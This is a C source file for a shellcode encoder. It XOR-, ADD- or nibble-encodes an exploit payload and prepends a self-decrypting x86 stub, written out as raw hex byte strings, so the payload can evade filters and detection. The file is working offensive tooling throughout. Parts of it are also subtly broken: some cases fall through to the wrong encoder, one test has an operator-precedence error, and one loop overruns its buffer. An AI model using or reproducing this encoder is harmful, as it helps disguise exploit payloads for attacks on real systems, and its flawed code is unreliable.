#include "memcrypt.h"

void *memcrypt(void *shellcode, int type, int no, size_t size, size_t *retsize)
{
   int i,c=0;
   void *decrypt;
   char *output;
   size_t decsz;		/* Decryptor Size */

   switch(type) {
      case XOR_BYTE:		/* Byte xor routine */
         /* Get the decrypt routine for this shellcode */
        if(!(decrypt = makeDecryptor(XOR_BYTE, size, no, &decsz))) return NULL;

        for(i=0;i<size;i++) {
           ((char *)shellcode)[i] ^= no;	/* Do the xor! */
        }
        break;
      case XOR_WORD:		/* Word xor routine */
         if(!(decrypt = makeDecryptor(XOR_WORD, size, no, &decsz))) return NULL;

         for(i=0;i<size;) {
            ((char *)shellcode)[i++] ^= (no & 0xff);
            ((char *)shellcode)[i++] ^= (no >> 8 & 0xff);
         }
         break;
      case XOR_DWORD:
      case ADD_BYTE:		/* Byte add routine */
         if(!(decrypt = makeDecryptor(ADD_BYTE, size, no, &decsz))) return NULL;

         for(i=0;i<size;i++) {
            ((char *)shellcode)[i] += no;
         }
         break;
      case ADD_WORD:
         if(!(decrypt = makeDecryptor(ADD_WORD, size, no, &decsz))) return NULL;

         for(i=0;i<size;i++) {
            ((short *)shellcode)[i] += (no & 0xffff);
         }
         break;
      case ADD_DWORD:
      case UUDECODE:
         if(no & 0xf != 0) {
            printf("UUdecode expects a range in which shellcode will fall\n");
            exit(-1);
         }
         if(!(decrypt = makeDecryptor(UUDECODE, size, no, &decsz))) return NULL;

         output = (void *) malloc(decsz + size*2+1);
         memcpy(output, decrypt, decsz);
         for(i=decsz;i<size*2+decsz;c++) {
            output[i++] = ((((char *)shellcode)[c] & 0xf0) >> 4 | no);
            output[i++] = (((char*)shellcode)[c] & 0xf | no);
         }
         *retsize = size*2 + decsz;
         free(decrypt);
         return(output);
      default:
         return NULL;
   }

   output = (char *) malloc(decsz + size + 1);
   memcpy(output, decrypt, decsz);	/* Put decrypt routine in output */

   /*
      Bit of a hack - make sure that 0x00 bytes are going to be copied
      to the output; obviously, strcat() doesn't do this
   */
   memcpy((output+decsz), shellcode, size);

   *retsize = size + decsz;		/* Write back size */
   free(decrypt);			/* Keep memory clean */
   return(output);
}

/*
   This function creates a decryptor for size memory, garbled with
   the "type" encryption with number no
   Returns the size of the decryptor routine in ret_size
*/

void *makeDecryptor(int type, size_t size, unsigned int no, size_t *ret_size)
{
   /*
      --[ Byte functions
      0xAA marks the position of the shellcode size
      0xBB marks the position of the byte that will be subtracted

      --[ Word functions
      First 0xAA marks sizeof shellcode in words
      0xBB 0xAA marks xorno in little endian style

      --[ UUdecode function
      0xAA marks the size of the shellcode AFTER uuencoding
      (see asm/uudecode.asm for details)
   */

   /* Byte addition decryptor */
   char byte_dec[] = "\xeb\x05\x58\x89\xc6\xeb\x05\xe8\xf6\xff\xff\xff\x83"
                     "\xc6\x0f\x4e\x31\xc9\xb1\xAA\x80\x2e\xBB\x46\xe2\xfa";
   size_t byte_dec_s = sizeof(byte_dec)-1;

   /* Word addition decryptor */
   char word_dec[] = "\xeb\x05\x58\x89\xc6\xeb\x05\xe8\xf6\xff\xff\xff\x83"
                     "\xc6\x10\x31\xc9\xb1\xAA\x66\x81\x2e\xBB\xAA\x46\x46"
                     "\xe2\xf7";
   size_t word_dec_s = sizeof(word_dec)-1;

   /* Byte xor decryptor */
   char byte_dexor[] = "\xeb\x05\x58\x89\xc6\xeb\x05\xe8\xf6\xff\xff\xff\x83"
                       "\xc6\x0f\x4e\x31\xc9\xb1\xAA\x80\x36\xBB\x46\xe2\xfa";
   size_t byte_dexor_s = sizeof(byte_dexor)-1;

   /* Word xor decryptor */
   char word_dexor[] = "\xeb\x05\x58\x89\xc6\xeb\x05\xe8\xf6\xff\xff\xff\x83"
                       "\xc6\x10\x31\xc9\xb1\xAA\x66\x81\x36\xBB\xAA\x46\x46"
                       "\xe2\xf7";
   size_t word_dexor_s = sizeof(word_dexor)-1;

   /* UUdecode routine */
   char uudecode[] = "\xeb\x1e\x5e\x89\xf7\x31\xc9\xb1\xaa\x8a\x06\x8a\x5e\x01"
                     "\xc0\xe0\x04\x80\xe3\x0f\x08\xd8\x88\x07\x83\xc6\x02\x47"
                     "\xe2\xeb\xeb\x05\xe8\xdd\xff\xff\xff";

   size_t uudecode_s = sizeof(uudecode)-1;

   char *s;
   void *ret;

   switch(type) {
      case XOR_BYTE:	/* Byte xor decryptor */
         s = (char *) strchr(byte_dexor, 0xAA);
         *s = (char) size;
         s = (char *) strchr(byte_dexor, 0xBB);
         *s = (char) no;
         ret = (void *)malloc(byte_dexor_s);
         *ret_size = byte_dexor_s;
         return(memcpy(ret, byte_dexor, byte_dexor_s));
      case XOR_WORD:	/* Word xor decryptor */
         s = (char *) strchr(word_dexor, 0xAA);
         *s = (char) size/2+1;		/* Don't decrypt more than necessary */
         s = (char *) strchr(word_dexor, 0xBB);
         *s = (char) (no & 0xff);
         *(s+1) = (char) (no >> 8 & 0xff);
         ret = (void *)malloc(word_dexor_s);
         *ret_size = word_dexor_s;
         return(memcpy(ret, word_dexor, word_dexor_s));
      case XOR_DWORD:
      case ADD_BYTE:	/* Byte add decryptor */
         s = (char *) strchr(byte_dec, 0xAA);
         *s = (char) size;
         s = (char *) strchr(byte_dec, 0xBB);
         *s = (char) no;
         ret = (void*)malloc(byte_dec_s);
         *ret_size = byte_dec_s;
         return(memcpy(ret, byte_dec, byte_dec_s));
      case ADD_WORD:
         s = (char *) strchr(word_dec, 0xAA);
         *s = (char) size/2+1;
         s = (char *) strchr(word_dec, 0xBB);
         *s = (char) (no & 0xff);
         *(s+1) = (char) (no >> 8 & 0xff);
         ret = (void *) malloc(word_dec_s);
         *ret_size = word_dec_s;
         return(memcpy(ret, word_dec, word_dec_s));
      case ADD_DWORD:
      case UUDECODE:
         s = (char *) strchr(uudecode, 0xAA);
         *s = (char) size;
         ret = (void *) malloc(uudecode_s);
         *ret_size = uudecode_s;
         return(memcpy(ret, uudecode, uudecode_s));
      default:
         return NULL;
   }
   return NULL;
}

/* Not used - perhaps later */

void pxorerror(void)
{
   switch(errno) {
      case SIZEERR:
         fprintf(stderr, "Shellcode too big\n");
         break;
      case XORBYTETOOBIGERR:
         fprintf(stderr, "Can't byte xor with a number bigger than 255\n");
         break;
      case XORWORDTOOBIGERR:
         fprintf(stderr, "Can't word xor with a number bigger than 65535\n");
         break;
      case XORWORDTOOSMALLERR:
         fprintf(stderr, "Word not big enough - use byte xorring instead\n");
         break;
      default:
         fprintf(stderr, "An unknown error occured\n");
         break;
   }
}
